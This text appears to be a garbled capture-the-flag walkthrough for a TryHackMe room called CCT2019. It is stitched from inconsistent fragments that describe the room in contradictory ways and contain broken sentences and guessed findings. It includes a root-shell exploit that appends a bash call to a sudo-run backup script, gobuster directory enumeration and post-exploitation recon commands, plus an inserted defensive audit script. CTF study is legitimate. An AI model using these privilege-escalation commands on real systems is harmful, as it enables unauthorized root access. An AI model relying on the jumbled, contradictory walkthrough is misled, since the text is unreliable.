Visit port 80 – you might see a default Apache page or a login portal.
Check port 8080 – often a vulnerable web app.
The /opt/backup.py script contains a system backup routine. However, because we have write access to the directory, we can modify the script. When chester executes it via sudo, our malicious code runs as root.
Exploitation:
echo 'import os; os.system("/bin/bash")' >> /opt/backup.py
sudo /usr/bin/python3 /opt/backup.py
This spawns a root shell.
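A defender-side check for the misconfiguration described above, as an added example that is not part of the original walkthrough: it flags a sudo-executed script when the file or its parent directory is owned by, or writable by, anyone other than the trusted owner. It assumes GNU stat; the function names and the TRUSTED_OWNER variable are hypothetical, and directories higher up the path are not checked.

```shell
#!/bin/sh
# Added example: audit a script that sudoers lets a user run as root.
# Assumes GNU coreutils stat. TRUSTED_OWNER is a hypothetical knob.
TRUSTED_OWNER="${TRUSTED_OWNER:-root}"

# Report and return 1 if $1 is owned by someone other than TRUSTED_OWNER
# or is group/world-writable. Returns 2 if stat fails.
check_node() {
    owner=$(stat -c '%U' "$1") || return 2
    mode=$(stat -c '%a' "$1") || return 2
    rc=0
    if [ "$owner" != "$TRUSTED_OWNER" ]; then
        echo "RISK: $1 is owned by $owner, not $TRUSTED_OWNER"
        rc=1
    fi
    # 022 (octal) = group-write | other-write
    if [ $(( 0$mode & 022 )) -ne 0 ]; then
        echo "RISK: $1 is group/world-writable (mode $mode)"
        rc=1
    fi
    return $rc
}

# Audit the script AND its parent directory: write access to the
# directory lets a user replace the file even if the file is read-only.
audit_sudo_script() {
    target=$1
    if [ ! -e "$target" ]; then
        echo "MISSING: $target"
        return 2
    fi
    status=0
    check_node "$target" || status=1
    check_node "$(dirname "$target")" || status=1
    if [ "$status" -eq 0 ]; then
        echo "OK: $target"
    fi
    return $status
}

# Stand-alone use: pass the script path named in the sudoers rule,
# e.g. /opt/backup.py from the text above.
if [ "$#" -gt 0 ]; then
    audit_sudo_script "$1"
fi
```

A clean result requires both the script and its directory to pass; fixing only the file's mode leaves the directory-replacement path open.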
Note: In the specific CCT2019 challenge, there is often a specific hint regarding "Cigarette" or "Smoke" malware.
Investigation Steps:
The CCT2019 room on TryHackMe is a collection of legacy challenges from the US Navy Cyber Competition Team 2019 Assessment. It is rated "insane" difficulty and covers various categories including Web, Reversing, Pwn, and Forensics.
Below is a breakdown of the primary challenges and methodologies for the room.
Challenge: re3 (Reverse Engineering)
This challenge involves a .NET PE executable that requires a 32-character hex blob as the answer.
Initial Analysis: Running the command identifies it as a 32-bit .NET assembly to decompile and analyze the source code.
Methodology:
Focus on the module named , which contains the core logic.
Analyze the GUI components; the application features four sliders with values ranging from 0 to 1024.
Locate the verification function that checks if the slider positions match a specific hardcoded or calculated condition to generate the final hex string.
General Room Strategy
Given the "insane" rating, many challenges in this room follow a theme of analytical depth over speed.
Web Exploitation: Common vulnerabilities in these challenges include SQL Injection (CVE-2019-9053) or exploiting misconfigured services.
Privilege Escalation: Look for binary exploitation opportunities or common misconfigurations like LD_PRELOAD abuse or vulnerable
Persistence: Note that these are legacy challenges from the US Tenth Fleet; solutions often require understanding older software versions and specific environment quirks from that 2019 timeframe.
I believe you’re referring to the CCT2019 room on TryHackMe and asking about a “useful feature” — likely a tool, technique, or functionality that helps solve the room.
The CCT2019 room (CyberChef: The Cyber Swiss Army Knife) focuses on using CyberChef to decode, decrypt, and manipulate data.
Visit http://<MACHINE_IP> in your browser. You will see a standard Apache default page or a generic site.
The key here is to discover hidden directories or files.
Tool: gobuster or dirsearch
Command (Gobuster):
gobuster dir -u http://<MACHINE_IP> -w /usr/share/wordlists/dirb/common.txt
Findings:
You should find a directory called /notes/ (or sometimes just a specific file like note.txt).
Investigation:
Navigate to http://<MACHINE_IP>/notes/. You will likely find a text file (e.g., note.txt) containing a message.
Content of the note: The note usually appears to be from a system administrator mentioning a secret directory or a hidden file.
Example: "I moved the secret development stuff to /secret/"
The presence of two web servers indicates multiple attack surfaces. Port 80 looks like a static corporate site, while port 8080 might host a development or internal tool with weak security.
Pro Tip: Always check robots.txt, /backup, and /admin directories on both ports. Use gobuster or dirb for deeper enumeration.
whoami
id
uname -a
sudo -l
cat /etc/crontab
find / -perm -4000 2>/dev/null # SUID binaries